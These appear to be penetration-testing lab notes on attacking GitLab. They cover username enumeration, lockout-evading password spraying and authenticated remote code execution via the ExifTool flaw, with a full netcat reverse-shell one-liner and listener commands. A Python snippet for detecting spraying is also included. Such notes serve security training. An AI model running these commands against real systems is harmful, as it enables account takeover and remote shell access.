16. Attacking GitLab

1. Username Enumeration

Manual Enumeration

  • Attempt to register accounts with various usernames. GitLab will indicate if a username is already taken, confirming its existence.

Automated Enumeration

  • Use the gitlab_userenum.sh script, or its Python 3 equivalent gitlab_userenum.py, to automate the check over a username list.

Command Examples

# Bash script version
./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt

# Python script version
python3 gitlab_userenum.py -u http://gitlab.inlanefreight.local:8081/ -l users.txt

Password Spraying

  • After enumerating usernames, perform password spraying with common passwords or credentials from data breaches.

  • GitLab’s default account lockout policy:

    • 10 failed attempts trigger a 10-minute lockout.

  • Avoid triggering the lockout or brute-force detection by spacing attempts out (slow, distributed attacks).
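As an added example (not part of these notes or of the enumeration scripts named above), the defender's side of this section: detection logic run over authentication events that catches a burst of registration probes and a low-and-slow spray that stays under the 10-failure lockout per account. The one-JSON-object-per-line event layout, the one-hour window and the distinct-user threshold are assumptions, and the sample events are constructed.

```python
import json
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample events, not real GitLab log output; the one-JSON-object-per-line
# layout with time/event/source_ip/username fields is an assumption.
SAMPLE_EVENTS = """\
{"time":"2024-03-01T09:00:00Z","event":"login_failed","source_ip":"203.0.113.5","username":"alice"}
{"time":"2024-03-01T09:07:00Z","event":"login_failed","source_ip":"203.0.113.5","username":"bob"}
{"time":"2024-03-01T09:14:00Z","event":"login_failed","source_ip":"203.0.113.5","username":"carol"}
{"time":"2024-03-01T09:21:00Z","event":"login_failed","source_ip":"203.0.113.5","username":"dave"}
{"time":"2024-03-01T09:28:00Z","event":"login_success","source_ip":"203.0.113.5","username":"dave"}
{"time":"2024-03-01T09:01:00Z","event":"login_failed","source_ip":"198.51.100.7","username":"alice"}
{"time":"2024-03-01T09:02:00Z","event":"login_success","source_ip":"198.51.100.7","username":"alice"}
{"time":"2024-03-01T11:00:00Z","event":"register_attempt","source_ip":"192.0.2.9","username":"admin"}
{"time":"2024-03-01T11:00:03Z","event":"register_attempt","source_ip":"192.0.2.9","username":"root"}
{"time":"2024-03-01T11:00:06Z","event":"register_attempt","source_ip":"192.0.2.9","username":"jsmith"}
{"time":"2024-03-01T11:00:09Z","event":"register_attempt","source_ip":"192.0.2.9","username":"dev"}
"""

LOCKOUT_THRESHOLD = 10        # GitLab default: 10 failed attempts lock the account
WINDOW = timedelta(hours=1)   # sliding window for the per-source rule (assumption)
DISTINCT_USERS = 4            # distinct accounts per source before alerting (assumption)

def parse_events(text):
    events = [json.loads(l) for l in text.splitlines() if l.strip()]
    for e in events:
        e["time"] = datetime.fromisoformat(e["time"].replace("Z", "+00:00"))
    return sorted(events, key=lambda e: e["time"])

def per_account_failures(events):  # the lockout counter's view: failures per account
    return Counter(e["username"] for e in events if e["event"] == "login_failed")

def flag_sources(events, event_type, threshold=DISTINCT_USERS, window=WINDOW):
    """Flag each source IP that touches >= threshold distinct usernames with event_type
    inside one sliding window; a spray under the per-account lockout limit still shows."""
    by_ip = {}
    for e in events:
        if e["event"] == event_type:
            by_ip.setdefault(e["source_ip"], []).append(e)
    findings = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1                      # slide the window forward
            users = {x["username"] for x in evs[start:end + 1]}
            if len(users) >= threshold and len(users) > len(findings.get(ip, ())):
                findings[ip] = sorted(users)    # widest set seen for this source
    return findings
```

The per-account counter never reaches the lockout threshold on this data, while the per-source rule flags both the spraying host and the registration prober.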


2. Authenticated Remote Code Execution (RCE)

Vulnerability Details

  • GitLab Community Edition ≤13.10.2 is vulnerable to authenticated RCE because uploaded images are passed to ExifTool, which handles their metadata improperly.

Exploitation Steps

  1. Use the gitlab_13_10_2_rce.py exploit script with the credentials of a valid account.

  2. Run it as below to gain a reverse shell (-t is the target URL, -u and -p the account credentials, -c the command executed on the server; the example command spawns a Netcat reverse shell back to the listener set up below):

Command Example

python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f'

Setting Up a Netcat Listener

  • Start a Netcat listener to receive the reverse shell connection.

Command Example

nc -lnvp 8443

Key Takeaways

Username Enumeration

  • Helps identify valid accounts for potential password spraying.

  • GitLab’s lockout settings must be factored into attack methodology.

RCE Exploitation

  • The ExifTool vulnerability allows remote code execution with valid credentials.

  • If self-registration is enabled, attackers can create an account for exploitation.

Reverse Shell Considerations

  • The RCE exploit initiates a reverse shell to establish persistent access.

Ethical Considerations

  • Only conduct testing on authorized systems.

  • Replace placeholders (IP addresses, ports, credentials) with real values as needed.


Summary of Commands

# Username Enumeration (gitlab_userenum.sh)
./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt

# Username Enumeration (gitlab_userenum.py)
python3 gitlab_userenum.py -u http://gitlab.inlanefreight.local:8081/ -l users.txt

# Authenticated RCE (gitlab_13_10_2_rce.py)
python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f'

# Netcat Listener
nc -lnvp 8443
